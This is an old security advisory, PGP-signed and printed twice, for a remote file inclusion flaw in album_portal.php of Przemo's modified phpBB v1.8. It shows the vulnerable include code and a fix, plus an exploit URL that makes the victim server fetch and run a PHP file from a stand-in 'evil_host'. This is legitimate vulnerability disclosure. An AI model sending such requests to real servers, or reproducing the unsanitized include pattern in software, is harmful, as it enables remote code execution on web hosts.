Dariusz 'Officerrr' Kolasinski
20/04/04, 12:15
=2D----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Product: phpBB modified by Przemo
Version: v1.8
Vendor: http://przemo.org/phpBB2/
Discover by: Officerrr =A0<officerrr at poligon.com.pl>
Vendor Response: Not contacted yet...
Severity: Medium (arbitary code execution as webserver user)
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Description:
This modification is based on phpBB 2.0.X script, it contains about
200 add-ons, with ability to switch off any of them in admin`s panel.
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Vulnerable code:
=46ile: album_portal.php
$album_root_path =3D $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
=46ix:
Change the following lines in album_portal.php file
$album_root_path =3D $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
to
define('IN_PHPBB', true);
$phpbb_root_path =3D './';
$album_root_path =3D $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=3Dhttp://[evil_host]/=
&phpEx=3D/../../[evil_file.php]
evil_file.php must exist on the evil_host.
=2D --
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"
=2D----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFAhBFy+p+rYQE3C+ARAsX0AJ4okoVUeq0ehzHMrJJsqP d051kP8wCdE0dc
tKFC2tbN1lJSYXJb1sdttRg=3D
=3DNeZg
=2D----END PGP SIGNATURE-----
Hash: SHA1
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Product: phpBB modified by Przemo
Version: v1.8
Vendor: http://przemo.org/phpBB2/
Discover by: Officerrr =A0<officerrr at poligon.com.pl>
Vendor Response: Not contacted yet...
Severity: Medium (arbitary code execution as webserver user)
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Description:
This modification is based on phpBB 2.0.X script, it contains about
200 add-ons, with ability to switch off any of them in admin`s panel.
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Vulnerable code:
=46ile: album_portal.php
$album_root_path =3D $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
=46ix:
Change the following lines in album_portal.php file
$album_root_path =3D $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
to
define('IN_PHPBB', true);
$phpbb_root_path =3D './';
$album_root_path =3D $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
=2D --=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=
=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D----=3D=3D=3D=3D--=
=2D-=3D=3D=3D--
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=3Dhttp://[evil_host]/=
&phpEx=3D/../../[evil_file.php]
evil_file.php must exist on the evil_host.
=2D --
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"
=2D----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFAhBFy+p+rYQE3C+ARAsX0AJ4okoVUeq0ehzHMrJJsqP d051kP8wCdE0dc
tKFC2tbN1lJSYXJb1sdttRg=3D
=3DNeZg
=2D----END PGP SIGNATURE-----